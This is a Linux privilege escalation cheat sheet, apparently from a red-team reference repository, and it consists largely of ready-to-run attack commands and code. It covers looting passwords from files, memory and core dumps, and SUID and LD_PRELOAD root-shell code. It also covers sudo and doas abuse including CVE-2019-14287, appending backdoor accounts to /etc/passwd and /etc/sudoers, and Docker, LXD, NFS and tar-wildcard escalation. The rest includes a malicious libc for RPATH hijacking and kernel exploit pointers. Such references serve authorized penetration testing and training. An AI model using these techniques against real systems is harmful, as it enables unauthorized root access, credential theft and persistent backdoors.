linux-privilege-escalation.md (31518B)
1 --- 2 title: "Linux - Privilege Escalation" 3 section: "Red Team" 4 sectionSlug: "redteam" 5 sourcePath: "docs/redteam/escalation/linux-privilege-escalation.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/escalation/linux-privilege-escalation.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Linux - Privilege Escalation 12 13 ## Summary 14 15 * [Tools](#tools) 16 * [Checklist](#checklists) 17 * [Looting for passwords](#looting-for-passwords) 18 * [Files containing passwords](#files-containing-passwords) 19 * [Old passwords in /etc/security/opasswd](#old-passwords-in-etcsecurityopasswd) 20 * [Last edited files](#last-edited-files) 21 * [In memory passwords](#in-memory-passwords) 22 * [Find sensitive files](#find-sensitive-files) 23 * [SSH Key](#ssh-key) 24 * [Sensitive files](#sensitive-files) 25 * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) 26 * [Scheduled tasks](#scheduled-tasks) 27 * [Cron jobs](#cron-jobs) 28 * [Systemd timers](#systemd-timers) 29 * [SUID](#suid) 30 * [Find SUID binaries](#find-suid-binaries) 31 * [Create a SUID binary](#create-a-suid-binary) 32 * [Capabilities](#capabilities) 33 * [List capabilities of binaries](#list-capabilities-of-binaries) 34 * [Edit capabilities](#edit-capabilities) 35 * [Interesting capabilities](#interesting-capabilities) 36 * [SUDO](#sudo) 37 * [NOPASSWD](#nopasswd) 38 * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd) 39 * [Doas](#doas) 40 * [sudo_inject](#sudo_inject) 41 * [CVE-2019-14287](#cve-2019-14287) 42 * [GTFOBins](#gtfobins) 43 * [Wildcard](#wildcard) 44 * [Writable files](#writable-files) 45 * [Writable /etc/passwd](#writable-etcpasswd) 46 * [Writable /etc/sudoers](#writable-etcsudoers) 47 * [NFS Root Squashing](#nfs-root-squashing) 48 * [Shared Library](#shared-library) 49 * [ldconfig](#ldconfig) 50 * [RPATH](#rpath) 51 * [Groups](#groups) 52 * [Docker](#docker) 53 * [LXC/LXD](#lxclxd) 54 * [Hijack TMUX session](#hijack-tmux-session) 55 * [Kernel Exploits](#kernel-exploits) 56 * [CVE-2022-0847 (DirtyPipe)](#cve-2022-0847-dirtypipe) 57 * [CVE-2016-5195 (DirtyCow)](#cve-2016-5195-dirtycow) 58 * [CVE-2010-3904 (RDS)](#cve-2010-3904-rds) 59 * [CVE-2010-4258 (Full Nelson)](#cve-2010-4258-full-nelson) 60 * [CVE-2012-0056 (Mempodipper)](#cve-2012-0056-mempodipper) 61 62 ## Tools 63 64 There are many scripts that you can execute on a linux machine which automatically enumerate sytem information, processes, and files to locate privilege escalation vectors. 65 Here are a few: 66 67 * [LinPEAS - Linux Privilege Escalation Awesome Script](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) 68 69 ```powershell 70 wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh 71 curl "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -o linpeas.sh 72 ./linpeas.sh -a #all checks - deeper system enumeration, but it takes longer to complete. 73 ./linpeas.sh -s #superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk. 74 ./linpeas.sh -P #Password - Pass a password that will be used with sudo -l and bruteforcing other users 75 ``` 76 77 * [LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs](https://github.com/diego-treitos/linux-smart-enumeration) 78 79 ```powershell 80 wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh 81 curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh 82 ./lse.sh -l1 # shows interesting information that should help you to privesc 83 ./lse.sh -l2 # dump all the information it gathers about the system 84 ``` 85 86 * [LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum) 87 88 ```powershell 89 ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t 90 ``` 91 92 * [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) 93 * [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) 94 * [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) 95 * [Privilege Escalation through sudo - Linux](https://github.com/TH3xACE/SUDO_KILLER) 96 97 ## Checklists 98 99 * Kernel and distribution release details 100 * System Information: 101 * Hostname 102 * Networking details: 103 * Current IP 104 * Default route details 105 * DNS server information 106 * User Information: 107 * Current user details 108 * Last logged on users 109 * Shows users logged onto the host 110 * List all users including uid/gid information 111 * List root accounts 112 * Extracts password policies and hash storage method information 113 * Checks umask value 114 * Checks if password hashes are stored in /etc/passwd 115 * Extract full details for 'default' uid's such as 0, 1000, 1001 etc 116 * Attempt to read restricted files i.e. /etc/shadow 117 * List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.) 118 * Basic SSH checks 119 * Privileged access: 120 * Which users have recently used sudo 121 * Determine if /etc/sudoers is accessible 122 * Determine if the current user has Sudo access without a password 123 * Are known 'good' breakout binaries available via Sudo (i.e. nmap, vim etc.) 124 * Is root's home directory accessible 125 * List permissions for /home/ 126 * Environmental: 127 * Display current $PATH 128 * Displays env information 129 * Jobs/Tasks: 130 * List all cron jobs 131 * Locate all world-writable cron jobs 132 * Locate cron jobs owned by other users of the system 133 * List the active and inactive systemd timers 134 * Services: 135 * List network connections (TCP & UDP) 136 * List running processes 137 * Lookup and list process binaries and associated permissions 138 * List inetd.conf/xined.conf contents and associated binary file permissions 139 * List init.d binary permissions 140 * Version Information (of the following): 141 * Sudo 142 * MYSQL 143 * Postgres 144 * Apache 145 * Checks user config 146 * Shows enabled modules 147 * Checks for htpasswd files 148 * View www directories 149 * Default/Weak Credentials: 150 * Checks for default/weak Postgres accounts 151 * Checks for default/weak MYSQL accounts 152 * Searches: 153 * Locate all SUID/GUID files 154 * Locate all world-writable SUID/GUID files 155 * Locate all SUID/GUID files owned by root 156 * Locate 'interesting' SUID/GUID files (i.e. nmap, vim etc) 157 * Locate files with POSIX capabilities 158 * List all world-writable files 159 * Find/list all accessible *.plan files and display contents 160 * Find/list all accessible *.rhosts files and display contents 161 * Show NFS server details 162 * Locate *.conf and*.log files containing keyword supplied at script runtime 163 * List all *.conf files located in /etc 164 * Locate mail 165 * Platform/software specific tests: 166 * Checks to determine if we're in a Docker container 167 * Checks to see if the host has Docker installed 168 * Checks to determine if we're in an LXC container 169 170 ## Looting for passwords 171 172 ### Files containing passwords 173 174 ```powershell 175 grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null 176 find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \; 177 ``` 178 179 ### Old passwords in /etc/security/opasswd 180 181 The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them. 182 183 :warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes 184 185 ### Last edited files 186 187 Files that were edited in the last 10 minutes 188 189 ```powershell 190 find / -mmin -10 2>/dev/null | grep -Ev "^/proc" 191 ``` 192 193 ### In memory passwords 194 195 **Memory**: 196 197 ```powershell 198 strings /dev/mem -n10 | grep -i PASS 199 ``` 200 201 **Core Dump**: 202 203 ```ps1 204 # Find PID 205 ps -eo pid,command 206 207 # Core dump PID 208 gcore <pid> -o dumpfile 209 210 # Search for passwords 211 strings -n 5 dumpfile | grep -i pass 212 ``` 213 214 ### Find sensitive files 215 216 ```powershell 217 $ locate password | more 218 /boot/grub/i386-pc/password.mod 219 /etc/pam.d/common-password 220 /etc/pam.d/gdm-password 221 /etc/pam.d/gdm-password.original 222 /lib/live/config/0031-root-password 223 ... 224 ``` 225 226 ### Preseed 227 228 A preseed.cfg file is used in Debian-based Linux distributions to automate the installation process. It contains answers to the questions that the installer normally asks, allowing for a fully unattended installation. This file can specify configurations such as partitioning schemes, package selections, network settings, and user accounts. 229 230 * Root password in clear text 231 232 ```ps1 233 d-i passwd/root-password password root_password_123 234 d-i passwd/root-password-again password root_password_123 235 ``` 236 237 * Root password encrypted using an MD5 hash 238 239 ```ps1 240 d-i passwd/root-password-crypted password $1$DhSfFtNS$v/Eb.KsQkTq8nKIX1.B8n. 241 ``` 242 243 * Normal user's password in clear text 244 245 ```ps1 246 d-i passwd/user-password password my_password_123 247 d-i passwd/user-password-again password my_password_123 248 ``` 249 250 * Normal user's password encrypted using an MD5 hash 251 252 ```ps1 253 d-i passwd/user-password-crypted password $1$DgJMNO1/$BqfY2C5y00p0yhpApPmmJ1 254 ``` 255 256 ## SSH Key 257 258 ### Sensitive files 259 260 ```ps1 261 find / -name authorized_keys 2> /dev/null 262 find / -name id_rsa 2> /dev/null 263 ``` 264 265 ### SSH Key Predictable PRNG (Authorized_Keys) Process 266 267 This module describes how to attempt to use an obtained authorized_keys file on a host system. 268 269 Needed : SSH-DSS String from authorized_keys file 270 271 **Steps** 272 273 Get the authorized_keys file. An example of this file would look like so: 274 275 ```ps1 276 ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ... 277 ``` 278 279 Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`: 280 281 ```ps1 282 echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config 283 echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshd_config 284 /etc/init.d/ssh restart 285 ``` 286 287 Get [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) and unpack the keys: 288 289 ```ps1 290 git clone https://github.com/g0tmi1k/debian-ssh 291 cd debian-ssh 292 tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2 293 ``` 294 295 Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as: 296 297 ```ps1 298 grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf' 299 dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub 300 ``` 301 302 IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do: 303 304 ```ps1 305 ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934 306 ``` 307 308 And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why. 309 310 ## Scheduled tasks 311 312 ### Cron jobs 313 314 Check if you have access with write permission on these files. 315 Check inside the file, to find other paths with write permissions. 316 317 ```powershell 318 /etc/init.d 319 /etc/cron* 320 /etc/crontab 321 /etc/cron.allow 322 /etc/cron.d 323 /etc/cron.deny 324 /etc/cron.daily 325 /etc/cron.hourly 326 /etc/cron.monthly 327 /etc/cron.weekly 328 /etc/sudoers 329 /etc/exports 330 /etc/anacrontab 331 /var/spool/cron 332 /var/spool/cron/crontabs/root 333 334 crontab -l 335 ls -alh /var/spool/cron; 336 ls -al /etc/ | grep cron 337 ls -al /etc/cron* 338 cat /etc/cron* 339 cat /etc/at.allow 340 cat /etc/at.deny 341 cat /etc/cron.allow 342 cat /etc/cron.deny* 343 ``` 344 345 You can use [DominicBreuker/pspy](https://github.com/DominicBreuker/pspy) to detect a CRON job. 346 347 ```powershell 348 # print both commands and file system events and scan procfs every 1000 ms (=1sec) 349 ./pspy64 -pf -i 1000 350 ``` 351 352 ## Systemd timers 353 354 ```powershell 355 systemctl list-timers --all 356 NEXT LEFT LAST PASSED UNIT ACTIVATES 357 Mon 2019-04-01 02:59:14 CEST 15h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily.timer apt-daily.service 358 Mon 2019-04-01 06:20:40 CEST 19h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily-upgrade.timer apt-daily-upgrade.service 359 Mon 2019-04-01 07:36:10 CEST 20h left Sat 2019-03-09 14:28:25 CET 3 weeks 0 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service 360 361 3 timers listed. 362 ``` 363 364 ## SUID 365 366 SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is run, the uid will be changed by the owner one. If the file owner is `root`, the uid will be changed to `root` even if it was executed from user `bob`. SUID bit is represented by an `s`. 367 368 ```powershell 369 ╭─swissky@lab ~ 370 ╰─$ ls /usr/bin/sudo -alh 371 -rwsr-xr-x 1 root root 138K 23 nov. 16:04 /usr/bin/sudo 372 ``` 373 374 ### Find SUID binaries 375 376 ```bash 377 find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \; 378 find / -uid 0 -perm -4000 -type f 2>/dev/null 379 ``` 380 381 ### Create a SUID binary 382 383 | Function | Description | 384 | ---------- | ------------------------------------------------------- | 385 | setreuid() | sets real and effective user IDs of the calling process | 386 | setuid() | sets the effective user ID of the calling process | 387 | setgid() | sets the effective group ID of the calling process | 388 389 ```bash 390 print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c 391 gcc -o /tmp/suid /tmp/suid.c 392 sudo chmod +x /tmp/suid # execute right 393 sudo chmod +s /tmp/suid # setuid bit 394 ``` 395 396 ## Capabilities 397 398 ### List capabilities of binaries 399 400 ```powershell 401 ╭─swissky@lab ~ 402 ╰─$ /usr/bin/getcap -r /usr/bin 403 /usr/bin/fping = cap_net_raw+ep 404 /usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip 405 /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep 406 /usr/bin/rlogin = cap_net_bind_service+ep 407 /usr/bin/ping = cap_net_raw+ep 408 /usr/bin/rsh = cap_net_bind_service+ep 409 /usr/bin/rcp = cap_net_bind_service+ep 410 ``` 411 412 ### Edit capabilities 413 414 ```powershell 415 /usr/bin/setcap -r /bin/ping # remove 416 /usr/bin/setcap cap_net_raw+p /bin/ping # add 417 ``` 418 419 ### Interesting capabilities 420 421 Having the capability =ep means the binary has all the capabilities. 422 423 ```powershell 424 $ getcap openssl /usr/bin/openssl 425 openssl=ep 426 ``` 427 428 Alternatively the following capabilities can be used in order to upgrade your current privileges. 429 430 ```powershell 431 cap_dac_read_search # read anything 432 cap_setuid+ep # setuid 433 ``` 434 435 Example of privilege escalation with `cap_setuid+ep` 436 437 ```powershell 438 $ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7 439 440 $ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")' 441 sh-5.0# id 442 uid=0(root) gid=1000(swissky) 443 ``` 444 445 | Capabilities name | Description | 446 | -------------------- | ------------------------------------------------------------------------------------------------------------------------------------------- | 447 | CAP_AUDIT_CONTROL | Allow to enable/disable kernel auditing | 448 | CAP_AUDIT_WRITE | Helps to write records to kernel auditing log | 449 | CAP_BLOCK_SUSPEND | This feature can block system suspends | 450 | CAP_CHOWN | Allow user to make arbitrary change to files UIDs and GIDs | 451 | CAP_DAC_OVERRIDE | This helps to bypass file read, write and execute permission checks | 452 | CAP_DAC_READ_SEARCH | This only bypasses file and directory read/execute permission checks | 453 | CAP_FOWNER | This enables bypass of permission checks on operations that normally require the filesystem UID of the process to match the UID of the file | 454 | CAP_KILL | Allow the sending of signals to processes belonging to others | 455 | CAP_SETGID | Allow changing of the GID | 456 | CAP_SETUID | Allow changing of the UID | 457 | CAP_SETPCAP | Helps to transferring and removal of current set to any PID | 458 | CAP_IPC_LOCK | This helps to lock memory | 459 | CAP_MAC_ADMIN | Allow MAC configuration or state changes | 460 | CAP_NET_RAW | Use RAW and PACKET sockets | 461 | CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports | 462 463 ## SUDO 464 465 Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER) 466 467 ### NOPASSWD 468 469 Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password. 470 471 ```bash 472 $ sudo -l 473 474 User demo may run the following commands on crashlab: 475 (root) NOPASSWD: /usr/bin/vim 476 ``` 477 478 In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`. 479 480 ```bash 481 sudo vim -c '!sh' 482 sudo -u root vim -c '!sh' 483 ``` 484 485 ### LD_PRELOAD and NOPASSWD 486 487 If `LD_PRELOAD` is explicitly defined in the sudoers file 488 489 ```powershell 490 Defaults env_keep += LD_PRELOAD 491 ``` 492 493 Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles` 494 495 ```c 496 #include <stdio.h> 497 #include <sys/types.h> 498 #include <stdlib.h> 499 #include <unistd.h> 500 void _init() { 501 unsetenv("LD_PRELOAD"); 502 setgid(0); 503 setuid(0); 504 system("/bin/sh"); 505 } 506 ``` 507 508 Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=<full_path_to_so_file> <program>`, e.g: `sudo LD_PRELOAD=/tmp/shell.so find` 509 510 ### Doas 511 512 There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf` 513 514 ```bash 515 permit nopass demo as root cmd vim 516 ``` 517 518 ### sudo_inject 519 520 Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject) 521 522 ```powershell 523 $ sudo whatever 524 [sudo] password for user: 525 # Press <ctrl>+c since you don't have the password. 526 # This creates an invalid sudo tokens. 527 $ sh exploit.sh 528 .... wait 1 seconds 529 $ sudo -i # no password required :) 530 # id 531 uid=0(root) gid=0(root) groups=0(root) 532 ``` 533 534 Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf) 535 536 ### CVE-2019-14287 537 538 ```powershell 539 # Exploitable when a user have the following permissions (sudo -l) 540 (ALL, !root) ALL 541 542 # If you have a full TTY, you can exploit it like this 543 sudo -u#-1 /bin/bash 544 sudo -u#4294967295 id 545 ``` 546 547 ## GTFOBins 548 549 [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. 550 551 The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. 552 553 > gdb -nx -ex '!sh' -ex quit 554 > sudo mysql -e '\! /bin/sh' 555 > strace -o /dev/null /bin/sh 556 > sudo awk 'BEGIN {system("/bin/sh")}' 557 558 ## Wildcard 559 560 By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that's where the wildcard comes in handy. 561 562 ```powershell 563 # create file for exploitation 564 touch -- "--checkpoint=1" 565 touch -- "--checkpoint-action=exec=sh shell.sh" 566 echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh 567 568 # vulnerable script 569 tar cf archive.tar * 570 ``` 571 572 Tool: [wildpwn](https://github.com/localh0t/wildpwn) 573 574 ## Writable files 575 576 List world writable files on the system. 577 578 ```powershell 579 find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null 580 find / -perm -2 -type f 2>/dev/null 581 find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null 582 ``` 583 584 ### Writable /etc/sysconfig/network-scripts/ (Centos/Redhat) 585 586 /etc/sysconfig/network-scripts/ifcfg-1337 for example 587 588 ```powershell 589 NAME=Network /bin/id <= Note the blank space 590 ONBOOT=yes 591 DEVICE=eth0 592 593 EXEC : 594 ./etc/sysconfig/network-scripts/ifcfg-1337 595 ``` 596 597 src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) 598 599 ### Writable /etc/passwd 600 601 First generate a password with one of the following commands. 602 603 ```powershell 604 openssl passwd -1 -salt hacker hacker 605 mkpasswd -m SHA-512 hacker 606 python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' 607 ``` 608 609 Then add the user `hacker` and add the generated password. 610 611 ```powershell 612 hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash 613 ``` 614 615 E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` 616 617 You can now use the `su` command with `hacker:hacker` 618 619 Alternatively you can use the following lines to add a dummy user without a password. 620 WARNING: you might degrade the current security of the machine. 621 622 ```powershell 623 echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd 624 su - dummy 625 ``` 626 627 NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. 628 629 ### Writable /etc/sudoers 630 631 ```powershell 632 echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers 633 634 # use SUDO without password 635 echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers 636 echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers 637 ``` 638 639 ## NFS Root Squashing 640 641 When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it. 642 643 ```powershell 644 # remote check the name of the folder 645 showmount -e 10.10.10.10 646 647 # create dir 648 mkdir /tmp/nfsdir 649 650 # mount directory 651 mount -t nfs 10.10.10.10:/shared /tmp/nfsdir 652 cd /tmp/nfsdir 653 654 # copy wanted shell 655 cp /bin/bash . 656 657 # set suid permission 658 chmod +s bash 659 ``` 660 661 ## Shared Library 662 663 ### ldconfig 664 665 Identify shared libraries with `ldd` 666 667 ```powershell 668 $ ldd /opt/binary 669 linux-vdso.so.1 (0x00007ffe961cd000) 670 vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000) 671 /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000) 672 ``` 673 674 Create a library in `/tmp` and activate the path. 675 676 ```powershell 677 gcc –Wall –fPIC –shared –o vulnlib.so /tmp/vulnlib.c 678 echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so 679 /opt/binary 680 ``` 681 682 ### RPATH 683 684 ```powershell 685 level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH" 686 0x00000001 (NEEDED) Shared library: [libc.so.6] 687 0x0000000f (RPATH) Library rpath: [/var/tmp/flag15] 688 689 level15@nebula:/home/flag15$ ldd ./flag15 690 linux-gate.so.1 => (0x0068c000) 691 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) 692 /lib/ld-linux.so.2 (0x005bb000) 693 ``` 694 695 By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable. 696 697 ```powershell 698 level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ 699 700 level15@nebula:/home/flag15$ ldd ./flag15 701 linux-gate.so.1 => (0x005b0000) 702 libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) 703 /lib/ld-linux.so.2 (0x00737000) 704 ``` 705 706 Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` 707 708 ```powershell 709 #include<stdlib.h> 710 #define SHELL "/bin/sh" 711 712 int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) 713 { 714 char *file = SHELL; 715 char *argv[] = {SHELL,0}; 716 setresuid(geteuid(),geteuid(), geteuid()); 717 execve(file,argv,0); 718 } 719 ``` 720 721 ## Groups 722 723 ### Docker 724 725 Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`. 726 727 ```bash 728 $> docker run -it --rm -v $PWD:/mnt bash 729 $> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd 730 ``` 731 732 Almost similar but you will also see all processes running on the host and be connected to the same NICs. 733 734 ```powershell 735 docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash 736 ``` 737 738 Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell 739 740 ```powershell 741 $ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease 742 latest: Pulling from chrisfosterelli/rootplease 743 2de59b831a23: Pull complete 744 354c3661655e: Pull complete 745 91930878a2d7: Pull complete 746 a3ed95caeb02: Pull complete 747 489b110c54dc: Pull complete 748 Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0 749 Status: Downloaded newer image for chrisfosterelli/rootplease:latest 750 751 You should now have a root shell on the host OS 752 Press Ctrl-D to exit the docker instance / shell 753 754 sh-5.0# id 755 uid=0(root) gid=0(root) groups=0(root) 756 ``` 757 758 More docker privilege escalation using the Docker Socket. 759 760 ```powershell 761 sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash 762 sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh 763 ``` 764 765 ### LXC/LXD 766 767 The privesc requires to run a container with elevated privileges and mount the host filesystem inside. 768 769 ```powershell 770 ╭─swissky@lab ~ 771 ╰─$ id 772 uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel) 773 ``` 774 775 Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. 776 777 ```powershell 778 # build a simple alpine image 779 git clone https://github.com/saghul/lxd-alpine-builder 780 ./build-alpine -a i686 781 782 # import the image 783 lxc image import ./alpine.tar.gz --alias myimage 784 785 # run the image 786 lxc init myimage mycontainer -c security.privileged=true 787 788 # mount the /root into the image 789 lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true 790 791 # interact with the container 792 lxc start mycontainer 793 lxc exec mycontainer /bin/sh 794 ``` 795 796 Alternatively <https://github.com/initstring/lxd_root> 797 798 ## Hijack TMUX session 799 800 Require a read access to the tmux socket : `/tmp/tmux-1000/default`. 801 802 ```powershell 803 export TMUX=/tmp/tmux-1000/default,1234,0 804 tmux ls 805 ``` 806 807 ## Kernel Exploits 808 809 Precompiled exploits can be found inside these repositories, run them at your own risk ! 810 811 * [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits) 812 * [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/) 813 814 The following exploits are known to work well, search for more exploits with `searchsploit -w linux kernel centos`. 815 816 Another way to find a kernel exploit is to get the specific kernel version and linux distro of the machine by doing `uname -a` 817 Copy the kernel version and distribution, and search for it in google or in <https://www.exploit-db.com/>. 818 819 ### CVE-2022-0847 (DirtyPipe) 820 821 Linux Privilege Escalation - Linux Kernel 5.8 < 5.16.11 822 823 * [Lance Biggerstaff/2022-0847](https://www.exploit-db.com/exploits/50808) 824 825 ### CVE-2016-5195 (DirtyCow) 826 827 Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 828 829 ```powershell 830 # make dirtycow stable 831 echo 0 > /proc/sys/vm/dirty_writeback_centisecs 832 g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil 833 https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs 834 https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c 835 ``` 836 837 ### CVE-2010-3904 (RDS) 838 839 Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 840 841 ```powershell 842 https://www.exploit-db.com/exploits/15285/ 843 ``` 844 845 ### CVE-2010-4258 (Full Nelson) 846 847 Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) 848 849 ```powershell 850 https://www.exploit-db.com/exploits/15704/ 851 ``` 852 853 ### CVE-2012-0056 (Mempodipper) 854 855 Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) 856 857 ```powershell 858 https://www.exploit-db.com/exploits/18411 859 ``` 860 861 ## References 862 863 * [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) 864 * [Privilege escalation via Docker - April 22, 2015 - Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html) 865 * [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/) 866 * [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) 867 * [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/) 868 * [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) 869 * [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) 870 * [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) 871 * [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - 